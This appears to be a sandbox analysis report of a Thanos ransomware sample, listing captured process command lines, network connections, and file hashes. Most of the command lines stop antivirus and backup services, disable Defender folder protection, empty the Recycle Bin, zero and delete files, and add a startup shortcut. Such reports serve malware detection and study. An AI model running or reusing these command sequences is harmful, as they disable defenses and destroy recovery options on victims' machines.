C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE
"C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp90B8.bat
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.111.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| GB | 172.217.169.10:443 | content-autofill.googleapis.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | cutewallpaper.org | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 104.21.37.179:443 | cutewallpaper.org | tcp |
| US | 8.8.8.8:53 | 179.37.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 104.21.37.179:443 | cutewallpaper.org | tcp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
Files
\??\pipe\crashpad_4904_IDEBDHGRJLKYVUAD
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | ea601f7557372c938038511691e72819 |
| SHA1 | 7246e60ed9f53c7d8c7251a9dbddd6ad097647f6 |
| SHA256 | 43b73c7130f50c345ff3ccb8812d8667318e68e4730deb43e0f413d67a98c637 |
| SHA512 | f4020d9bd4f97118bd253f55d0ab6cd10aa88162be112d2dd9f03f94beb849fce2ca2b46437a09c990662e15e18e2633fa6abbd5a02d07fc582310f13e36dec2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e4841c75fdb233e0e6a289d1b93f1478 |
| SHA1 | 120e61bb7f88362a5dfdd81acb39ec3f7def5ff1 |
| SHA256 | b08c65e2e947c7b5e14f71b5fc3c88f4b825d08bd5370da07d9b589449e8d1b1 |
| SHA512 | 18246a6473e1ade69caf449ff0f6b0340f6f2d0e6ce04b9cf58913b0b879f5fde9b940181cf43eca29faa05925450f49053f1bbeb8a873e293d0479620dde065 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1c0feed57b941fdd6ef118c19336ac5c |
| SHA1 | f7e16154494899ccb96c667a6abc08e7a614b79e |
| SHA256 | 69901215a6f57bb35e2145552adcdd71ba8db9eeb31cc29f878f915a712c8c5e |
| SHA512 | fdb325e53586903cc7595afc0e792d016ff3c5db10754e3856122019f90e2eed595075633e0ec629416bc467c72e48c7f20841599c02dbacb65f4a2998f31005 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | bbdf40027a966dc1edce479894ec339c |
| SHA1 | 0c683e6b1ca57a8036824cba01b113ecee5c26ce |
| SHA256 | bb38f5f938e16ed4773b643553bff8b75513c4b0c1c658f164ad8b1eac6c8c85 |
| SHA512 | 486bdc6bff2a9c9cdd3092605c7c57bda891eef459fa8073ad8ec38a2c7df425bf9fac24200e7151ba2ad86e28461403f602d6320b5c79f014ee59a2a7648aa2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 2ca1a23f9416b66d25180a00db9b90a8 |
| SHA1 | 1eab7e4b1fd9d10aac25cd9436d66ccadb6cd42f |
| SHA256 | 888a7a029a9fd67237a06567aa562a2c9e018ab18d633c75b4469abd9b793147 |
| SHA512 | 16c24a80a5f08acdddab763d84be175bdd2bdb6cb16f6807eaa69a0b5279c8570f88d71fb9d29474c3eff97eef5b3a25bcd3b5413750becb61f0d1d674dd232a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b567ca3bb1d13b8238912ff76450659e |
| SHA1 | dc29d727b566d5c91de1a822d5aaed699fa64bf9 |
| SHA256 | ebd9422ebaade65c1256aae1b0f0605c66f2922141c94bee6de03f9ff9c18cf8 |
| SHA512 | 03fe4464ad63daa83d5f658177e86cb13ab66b5ed9cb383497d5285f122e5a3e3ee45240396b7123c0906e607bcba660bf4b712274e0c9060ed26f69f2550c9d |
C:\Users\Admin\Downloads\Ransomware.Thanos.zip
| MD5 | 00184463f3b071369d60353c692be6f0 |
| SHA1 | d3c1e90f39da2997ef4888b54d706b1a1fde642a |
| SHA256 | cd0f55dd00111251cd580c7e7cc1d17448faf27e4ef39818d75ce330628c7787 |
| SHA512 | baa931a23ecbcb15dda6a1dc46d65fd74b46ccea8891c48f0822a8a10092b7d4f7ea1dc971946a161ac861f0aa8b99362d5bea960b47b10f8c91e33d1b018006 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b6dcf0ecb9dddf705ac0c1534e5d52c9 |
| SHA1 | 27b0af568c30cd3482cb0958192c3956f5bfc19d |
| SHA256 | 25fc2a1c62fa26ace2b90ddc94e2f5abb24b0b2e525a5ebfa041a1366154b79e |
| SHA512 | 82e6cbcc18a0738085b947787f577a381966a1330673042ac0eed7bb8042166b04701abb432063e6f3c927a4b6894dd168c46e76222d2af75c72973f2e7770ea |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 17c667849ecd92c8a834f02a88da223b |
| SHA1 | 8bcbbeb3e9655abdf731af9c69c56ddb5570ac1a |
| SHA256 | 5083a209841c34992e66b8ff94691f42899b1290d1907557dc8d5a0b4c8e7357 |
| SHA512 | ebbb6b1e302573ae5a000022fdc3bd48b6a930e80bd8415598566182dfc6de3fa1e2e39cfeae63e0c2dffaeb7d3dd310f41315b4e34db7f218b97d316b2f0c20 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 91cf71eedd2010b32243dff7a19a9ac5 |
| SHA1 | 8bb971729217d9e712b2ce65453d823dbe66233a |
| SHA256 | 1ea12c7bea133ede2ccc1f6eb67c012af9f962b144b4bd2c44a4482b59a3b609 |
| SHA512 | 260379c768cc8f223b13ab967d2189626edd7608e6f0ed53daa4ae8e28955da5216a0a50d08f50ca2cb233f812685a42fd0e6ca0e89d963ed3116ab31ddf4ee1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | d07b6c78f46670b7baa834ac65d80036 |
| SHA1 | 7c65291f00482e1227b1d1d9584d3fb906b23d2f |
| SHA256 | 28a84a17a62c2c9defcbacfe7e74ae72c4d2a4811fb714ca9dfbb27cf010dd99 |
| SHA512 | 4fb3cfd734443463fbddcce25a2e1b50b07a5d305e91b4b947f581ed41f661922beb9add5ea73fc0f4b2427da787ede2ccf796c0268d3d7fcaa18976c6d28009 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 309060fe08d23c99dd686b53454ad2b8 |
| SHA1 | 8e1fc2aa4f35b17cf6b92d910d23acf944b4933f |
| SHA256 | c0f9304c10c946ed2ee3d7ab4037adabc6b1a8dfe27f533e8c2de631df8ac926 |
| SHA512 | 93753749e9097ddcbb4101649437cc1a3942ed8998c201914271a126025afaa46ab02afd829e62a4dec4eba6eaa2e0b12eac2011ea80224d5e8324e8cebe0d50 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b5c0118f6f0df315105ec120298db466 |
| SHA1 | d7d53b7380f32f0f781bfb29d2b231e32080c998 |
| SHA256 | 5595d69dbe6dc7e3b1be45c057145538d8c7098593d9661ea639376bed12badb |
| SHA512 | 43c5de43a2cb6150c6e1107a915d8bdf7dd8310bbea558e00f3c08eccdba34c4a077920afea181af4edba9a3d0f1c38b1af81c0936d8a0c3dda82e14d50b1b14 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 89bc63e70a3f37631d12d384a9ed4146 |
| SHA1 | 566aaccb6e8a00a067a1a3fe3e0b83b71d3fe82b |
| SHA256 | b4d2f2f662b7ec0da6c4bd664da69fcc22a382296cb662094acb17a0ae67a495 |
| SHA512 | f749b5ca19486529800a6432ca046949779ab4fc096e6aab1ac0d79d35027385fec80767f1ff77ded340c5ee22fa9a38d5de80ac50446c95c2bc45124af0baeb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 9cd14fabc9b9e25f411ccad687bc424a |
| SHA1 | d49e970286197905fc6b923dea21f8d944651bf9 |
| SHA256 | 1245c5c4838115e3a69e46beee66239e4a0eb58046ca120d0e8e30d81d1e09fe |
| SHA512 | d4fe5083b2d0aea685fd08787270491d36476f21af762f3c27222bfb12fe9e92db0f109a6daabe747e6e66b4f18685e3d5441b8dfa6775ba3daeb420b1a46669 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | c4ff8ef4bd78d8739c2da662f7e79b52 |
| SHA1 | 1548f2699bf1786fdbf05468376ba9ffb3eda562 |
| SHA256 | b56388b246c35514abf324f0c756ca2a26a27fad328d815e48a61dd7d4c52d9d |
| SHA512 | 786a93170e22a6b7177841e49bda265b8c2d55090366d768ad9a230c2b8657707f9fb868e223c3ca79c5f9ad863d91a2b8efbdae540aeb5d406beac5093265b9 |
C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe
| MD5 | e01e11dca5e8b08fc8231b1cb6e2048c |
| SHA1 | 4983d07f004436caa3f10b38adacbba6a4ede01a |
| SHA256 | 58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f |
| SHA512 | 298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de |
memory/2540-389-0x0000000000A70000-0x0000000000A8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5rfelv1.zv3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/788-395-0x0000022CDDE10000-0x0000022CDDE32000-memory.dmp
C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE
| MD5 | be60e389a0108b2871dff12dfbb542ac |
| SHA1 | 14b4e0bfac64ec0f837f84ab1780ca7ced8d670d |
| SHA256 | 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d |
| SHA512 | 6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641 |
memory/6112-453-0x0000000000600000-0x000000000061C000-memory.dmp
memory/5468-467-0x0000000002870000-0x00000000028A6000-memory.dmp
memory/5468-468-0x0000000005280000-0x00000000058A8000-memory.dmp
C:\HOW_TO_DECYPHER_FILES.txt
| MD5 | 9520796899ab3dd7a9cd50cbfb496e1a |
| SHA1 | 565860779c4d3f9a7034b806b21493ddc9c79809 |
| SHA256 | 6ffef872ffcf921b88e4a26ef7584cc6c6fa4862b16f1606ce78df72d39f3c48 |
| SHA512 | e8d7343d4178cfcb9b5b70a561f9e901606a59a15e394cabd55b748b34ce4bfbf8326a0278703a8c5486d244b2a291f2611687909852bd0be9e9d558c76c6344 |
memory/5468-516-0x0000000005A20000-0x0000000005A86000-memory.dmp
memory/5468-515-0x00000000059B0000-0x0000000005A16000-memory.dmp
memory/5468-514-0x0000000005910000-0x0000000005932000-memory.dmp
memory/5468-526-0x0000000005D20000-0x0000000006074000-memory.dmp
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
| MD5 | 71f380ab6f64aea14092a99da8c07793 |
| SHA1 | d1797498e3141a6f4e42d1d371a09ada267a6b39 |
| SHA256 | ad43af3a1914954895d4daa2cc8124bd1229d4fc684254c7153a79f24865c97e |
| SHA512 | c1318181202e2e90bb2b8b545d9806cd1916d5857a9d87e857ffafc54cf585a981c384b957f3ba703323ba9abe26201ce8dfb991a402881a119e9615efdbb60d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/5468-534-0x00000000061B0000-0x00000000061FC000-memory.dmp
memory/5468-533-0x0000000006190000-0x00000000061AE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\HOW_TO_DECYPHER_FILES.txt
| MD5 | de09fbbf7f3b94cc2f7e36aa37065d06 |
| SHA1 | f0a868a9038530f81e4f8412904e3703bf416180 |
| SHA256 | f5e77fa11289a6dd102456608ccd8c5bd824b58123cd00cde1118a1ebd9db0d3 |
| SHA512 | 17a2567038f0331a836a0cf5c6513855454d9c6656e6619f74f0f9d72f0f5a8cd721a88794f498c404804f226e1c99c966c4c265d637b80c0141697608f84de4 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk
| MD5 | 56f4c6b47437e06381af45a85fc0f611 |
| SHA1 | 8118c7d7c39f49ed395fb0ae7fb19ee0e95368a5 |
| SHA256 | f20821e1db6ac90c932ac8f927cfdf4853041bdcb3f177d89dfa8541cccaf93f |
| SHA512 | 192a1f72f6191aea031b51cb73d318a5e57c3143c7649759e1ca56abc952e79e00fe020b2e652e22b36fb1dcc24128acab5a13fdd6ef1ef2f4cf6e7a538988d8 |
